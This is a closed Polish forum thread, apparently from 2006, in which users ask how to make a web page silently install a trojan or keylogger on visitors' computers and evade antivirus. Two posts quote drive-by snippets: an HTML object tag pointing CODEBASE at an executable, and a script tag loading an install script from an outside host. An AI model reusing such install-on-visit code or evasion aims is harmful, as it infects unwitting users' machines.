Instalowanie się trojana poprzez www -.-

Status
Zamknięty.

fufux

Użytkownik
Dołączył
Marzec 9, 2006
Posty
1
<object width=0 height=0 CODEBASE="1.exe" classid="CLSID:11111111-1111-1111-1111-111111111111" width=1 height=1></object>[/b]

wiem ze jestem noobkiem ale nie mam pojecia gdzie musi byc plik ktory bedzie automatycznie sciagany musi byc na ftp czy na moim kompie
to ma wygladac tak?
<object width=0 height=0 CODEBASE="C:Documents and SettingsfufuPulpitplik ze strona www" classid="CLSID:11111111-1111-1111-1111-111111111111" width=1 height=1></object>
:glupek2:
 

Grzem

Użytkownik
Dołączył
Marzec 18, 2006
Posty
55
na jakieś stronie znalazłem taki skrypt

Kod:
<script language="JavaScript" type="text/JavaScript" src="http://www.azebar.com/install/install.php?cnt=4"></script>

wirus uruchamiał sie a reagował tylko av
może ktoś to rozgryść bo ja jestem noobem
 

NeoX

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
28
Hej a czy istnieje jakaś niewykrywalna przez AV metoda autoinstalacji przez WWW??
Próbowałem kilka i z marnym skutkiem
<
 

Grzem

Użytkownik
Dołączył
Marzec 18, 2006
Posty
55
jak masz dobrego konika to i av go nie wykryje. Gożej jest z sp2 i formantem activeX
 

Jezior666

Użytkownik
Dołączył
Kwiecień 17, 2006
Posty
2
Problem

Mam problem bo chcialem dac keylogera pod jpga ;/ i cos nie wyszlo a konika to mam bpk
i jak sie wchodzi pisze ze zabezpieczenia nie pozwalaja odtworzyc Active x :/ =[ powiedzcie mi czy jest inna mozliwosc niż przez active x z gory dziekuje
smile.gif
 

FDJ

Były Moderator
Dołączył
Maj 23, 2005
Posty
1044
Re: Problem

Originally posted by Jezior666
Mam problem bo chcialem dac keylogera pod jpga ;/ i cos nie wyszlo a konika to mam bpk
i jak sie wchodzi pisze ze zabezpieczenia nie pozwalaja odtworzyc Active x :/ =[ powiedzcie mi czy jest inna mozliwosc niż przez active x z gory dziekuje
smile.gif

a poszukac to juz nie umiesz ??
 

pikaordie

Użytkownik
Dołączył
Kwiecień 9, 2006
Posty
12
znacie sie an zeczy ja tam probowalem z ajkims skryptem ale zaden firewall i av i sp2 nie dopusci do zainstalowanie trojanow ja zrobielem stronek ze starymi grami i po prze spy softa podczepilem kod trojana ale zeby zrobic ze ip przesyla to nie wiedzialem a w kazdym razie robic stronke zeby sie trojany instalowaly to nie jest warte zachodu moim zdniemD:
<
 

x_mateusz_x

Użytkownik
Dołączył
Czerwiec 15, 2004
Posty
30
To w końcu można zrobić taką stronę że gdy sie na nią wejdzie zainstaluje się trojan i odpali na kompie ofiary?? ( bez zadnych pytań, czy innych bzdur? )
 

FDJ

Były Moderator
Dołączył
Maj 23, 2005
Posty
1044
Originally posted by x_mateusz_x
To w końcu można zrobić taką stronę że gdy sie na nią wejdzie zainstaluje się trojan i odpali na kompie ofiary?? ( bez zadnych pytań, czy innych bzdur? )

mozna ,ale trzeba miec troche umiejetnosci i wiedzy
 

red_ag

Były Moderator
Dołączył
Listopad 26, 2005
Posty
261
Ktoś mądry nie będzie podawał "takiego" kodu tu, na forum, aby później bać się wejść na obojętnie jaką stronę domową. Otwieram, ale tylko do czasu pojawienia się kolejnych pytań "Jaki kod jest potrzebny do samoistnego odpalenia *.exe'lki"
 
Status
Zamknięty.
Do góry Bottom